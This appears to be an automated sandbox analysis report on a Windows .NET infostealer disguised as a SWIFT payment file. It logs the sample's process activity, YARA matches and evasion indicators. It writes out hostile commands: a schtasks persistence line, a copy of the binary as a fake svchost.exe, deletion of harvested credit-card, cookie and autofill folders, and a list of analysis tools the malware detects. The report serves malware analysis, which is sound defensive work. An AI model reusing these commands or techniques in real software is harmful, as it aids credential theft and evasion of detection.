                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 3108
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_00D77010
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_00D778E0
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_00D7ADE8
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_00D7B4C8
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_00D76CC8
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_06B42A1E
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_06B41660
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_06B42D08
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_06B43A68
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_014D1660
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_014D2A1E
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_014D3A68
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_014D2D08
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_053B7010
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_053BADE8
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_053B78E0
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_053B25E1
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_053B6CC8
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 40_2_05767010
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 40_2_0576ADE8
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 40_2_057678E0
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 40_2_05766CC8
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 0_2_01285020 CreateProcessAsUserA
                    Source: SWIFT_USD_165092.exe, 00000000.00000002.399782259.0000000002C51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOak.exe( vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000000.00000002.398773484.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.545146168.0000000005659000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZip.dll@ vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.548491096.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZip.dll@ vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.00000000039C2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZip.dll@ vs SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe Binary or memory string: OriginalFilenamemicrostub.exe, vs SWIFT_USD_165092.exe
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                    Source: SWIFT_USD_165092.exeReversingLabs: Detection: 32%
                    Source: SWIFT_USD_165092.exeVirustotal: Detection: 35%
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | File read: C:\Users\user\Desktop\SWIFT_USD_165092.exe
                    Source: SWIFT_USD_165092.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\SWIFT_USD_165092.exe C:\Users\user\Desktop\SWIFT_USD_165092.exe
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Users\user\Desktop\SWIFT_USD_165092.exe C:\Users\user\Desktop\SWIFT_USD_165092.exe
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\404d522a-62f5-4eb2-91f4-202649d15261
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 3108
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\88560075-49ce-438f-ba24-9980eb388270
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | File created: C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | File created: C:\Users\user\AppData\Local\Temp\b7fbbbd0-cab3-4baf-a44e-1add614b7f64
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@82/46@10/4
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: 8410782f-b87a-410a-a803-6bf5b1c3ff77.1.dr, 77aa76e1-9e8d-4193-9624-f537e5e34ab5.14.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: SWIFT_USD_165092.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Modules/SystemInfo/Info.cs | Base64 encoded string: 'lKf0D797r2Iyt1DnP/PTrLPjO4yO7cK6rxKN65nU62kv+P1cEg==', 'lKf0D797r2Iyt1DnNvPI9pD+M82z6su7r0besMvJ62kv+P1cEsvCbPMf', '+v+lV+Eysg995Q6iAuXIqZX1cOq17Mn12Ebe5Za2piZ9pqUSXJmN'
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/IOHelper.cs | Base64 encoded string: '/eO5Wu0o3jBo7Qi1UeCW9eyxMtXnw8iw/UHRs8WHiTxrobIAH9bZcY5x8gT6FyBh00JY/BJdh6DvKOnJit0bdC0XKc2bUc3b8xK/BJDJYPomdL/ya0Q0R2SqqAOFlU6ySvVplhHRyqQ2cfF2Ss2R8NEMRHTZxYyW3ktDsxS/SOTbae6dDFlaUlfq4sfcrHhIiGXebAcihs7Kzw=='
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_01
                    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5640
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4576:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4804:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2832:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4520:120:WilError_01
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4724:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2312:120:WilError_01
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: SWIFT_USD_165092.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                    Source: SWIFT_USD_165092.exe | Static file information: File size 2164736 > 1048576
                    Source: SWIFT_USD_165092.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SWIFT_USD_165092.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x20fe00
                    Source: SWIFT_USD_165092.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mscorlib.pdbMZ source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: Accessibility.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Windows.Forms.pdbSystem.Net.Http.dllXs source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: costura.costura.pdb.compressed source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Net.Http.pdbmscorlib.ni.dllp source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Net.Http.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.548491096.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.533583456.00000000039C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.662208925.0000000004155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver327 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbO source: SWIFT_USD_165092.exe, 00000001.00000002.548199153.000000000623B000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.547387044.000000000619A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Net.Http.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Management.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Drawing.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.pdb3 source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000003.506792457.00000000061F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q costura.dotnetzip.pdb.compressed source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: DotNetZip.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B19000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER14F4.tmp.dmp.37.dr

                    Data Obfuscation

                    Source: Yara match File source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: svchost.exe PID: 2332, type: MEMORYSTR
                    Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 0_2_01283902 push ecx; ret 0_2_01283903
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 0_2_0128304F push cs; ret 0_2_0128314A
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 0_2_01283747 push ss; ret 0_2_01283752
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Code function: 1_2_00D77EB8 pushad ; ret 1_2_00D77EB9
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_053B7EB2 pushad ; ret 14_2_053B7EB9
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 40_2_05767EB3 pushad ; ret 40_2_05767EB9

                    Persistence and Installation Behavior

                    Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe File created: C:\Users\user\AppData\Local\Logs\22-05-2023\Installed Software.txt
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe File created: C:\Users\user\AppData\Local\Logs\22-05-2023\Installed Software.txt

                    Boot Survival

                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: HOOKEXPLORER.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AUTORUNSC.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OLLYDBG.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: REGMON.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AUTORUNS.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PETOOLS.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IDAQ.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: DUMPCAP.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: FILEMON.EXE
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4048 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 7056 | Thread sleep time: -1800000s >= -30000s
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508 | Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508 | Thread sleep time: -100000s >= -30000s
